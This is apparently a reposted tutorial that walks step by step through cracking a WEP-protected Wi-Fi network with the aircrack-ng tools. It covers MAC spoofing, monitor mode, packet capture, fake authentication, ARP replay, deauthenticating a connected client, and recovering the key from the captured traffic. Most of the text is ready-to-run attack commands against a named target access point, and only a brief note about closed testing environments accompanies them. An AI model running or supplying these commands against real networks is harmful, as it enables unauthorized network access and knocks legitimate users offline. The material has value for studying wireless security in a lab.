Our information -
Wireless interface:
wlan0
Monitor mode interface:
mon0
Spoofed MAC –
00:11:22:33:44:55
? DO NOT EVER USE THIS AS YOUR
SPOOFED MAC ADDRESS OUTSIDE A CLOSED
TESTING ENVIRONMENT!
Target AP
information -
ESSID: pelican
BSSID:
00:0F:66:39:7B:BD
CH:
6
STA:
00:22:FA:29:FA:58
Attack
Setup
Spoof your wireless interface MAC address, enable monitor mode, and
spoof its
MAC address.
# ifconfig wlan0 down
# macchanger -m
00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
#
#
#
#
airmon-ng
start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55
mon0
ifcongif mon0 up
Find your target
# airodump-ng mon0
? Let run
until target AP has been found, then stop.
Reconfigure your monitor mode to
match the target?s channel and re-spoof the
MAC
address.
#
#
#
#
#
airmon-ng stop mon0
airmon-ng start
wlan0 6
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55
mon0
ifconfig mon0 up
Begin the Attack
# airodump-ng -c 6 --bssid
00:0F:66:39:7B:BD -w key mon0
? Let run.
Perform a Fake Authentication
attack to associate with the AP.
Open a new terminal.
# aireplay-ng -1 0
-e pelican -a 00:0F:66:39:7B:BD -h 00:11:22:33:44:55 mon0
Begin the ARP
Replay attack.
Open a new terminal.
# aireplay-ng -3 -b 00:0F:66:39:7B:BD
-h 00:22:FA:29:FA:58 mon0
? Let run.
De-authenticate the connected
STA.
Open a new terminal.
# aireplay-ng -0 1 -a 00:0F:66:39:7B:BD -c
00:22:FA:29:FA:58 mon0
? Harvest IVs.
Crack the Encryption
Open a new
terminal.
# aircrack-ng key*.cap; killall aireplay-ng airodump-ng
KEY
FOUND! [ 01:23:45:67:89 ]
The WEP network security key to ?pelican? is,
?0123456789?.
原文地址:http://www.cnblogs.com/alex-wood/p/3779669.html
